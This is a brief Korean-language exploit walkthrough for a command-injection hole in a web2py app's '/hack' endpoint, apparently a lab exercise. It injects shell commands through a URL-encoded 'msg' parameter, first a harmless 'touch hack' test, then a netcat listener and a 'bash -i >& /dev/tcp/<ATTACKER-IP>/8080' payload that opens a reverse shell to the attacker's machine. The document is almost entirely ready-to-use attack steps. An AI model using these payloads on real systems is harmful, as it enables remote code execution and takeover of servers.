
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27을 사용하여 명령어를 주입합니다. <IP-ADDRESS>와 <YOUR-COMMAND>를 자신의 값으로 교체하세요.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
공격자 머신에서 nc -l 127.0.0.1 8080을 실행합니다.
URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27로 이동합니다. <ATTACKER-IP>를 교체하세요.